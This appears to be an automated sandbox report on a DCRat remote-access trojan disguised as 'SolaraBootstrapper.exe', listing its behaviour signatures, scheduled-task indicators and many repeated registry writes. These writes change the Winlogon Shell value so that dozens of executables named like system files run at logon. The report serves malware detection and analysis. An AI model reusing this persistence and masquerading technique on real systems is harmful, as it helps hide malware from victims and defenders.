Malware Analysis Report

2024-11-15 05:52

Sample ID 240721-y1xp9ssflb
Target SolaraBootstrapper.exe
SHA256 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab
Tags
dcrat execution infostealer persistence privilege_escalation rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab

Threat Level: Known bad

The file SolaraBootstrapper.exe was found to be: Known bad.

Malicious Activity Summary

dcrat execution infostealer persistence privilege_escalation rat spyware stealer

DcRat

DCRat payload

Dcrat family

Process spawned unexpected child process

Modifies WinLogon for persistence

DCRat payload

Event Triggered Execution: AppInit DLLs

Command and Scripting Interpreter: PowerShell

.NET Reactor proctector

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Blocklisted process makes network request

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Runs ping.exe

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-21 20:15

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-21 20:15

Reported

2024-07-21 21:59

Platform

win7-20240708-en

Max time kernel

1800s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\14.0\Common C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\winNet\\Idle.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
